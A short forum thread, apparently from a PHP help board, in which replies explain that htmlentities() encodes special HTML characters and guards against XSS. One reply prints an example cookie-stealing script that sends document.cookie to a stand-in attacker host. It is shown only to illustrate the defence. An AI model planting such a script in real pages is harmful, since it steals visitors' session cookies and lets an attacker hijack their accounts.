Htmlentities... right.
Can somebody explain what it does actually?
Why do we need it? In what cases?
TIA
The HTML Entities Function
Moderator: General Moderators
turns anything that is a special html character into it's entity, entities are like html tags that cause html to be outputted "literally" to the browser, so that instead of <b>making text bold</b> you just want the bold html tag to output plainly to the screen. It's useful in posting examples of html source but is also a security necessity against XSS (allowing other users to 'inject' html into your page)
An example of HTML injection/XSS attack (Cookie stealing)
Now if these forums did not use htmlentities (or similar function) then http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.
But because php's htmlentities() replaces '<' with '<' and '>' with '>' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.
There are other characters that are changed aswell, " (double quote) for example.
Code: Select all
<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>But because php's htmlentities() replaces '<' with '<' and '>' with '>' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.
There are other characters that are changed aswell, " (double quote) for example.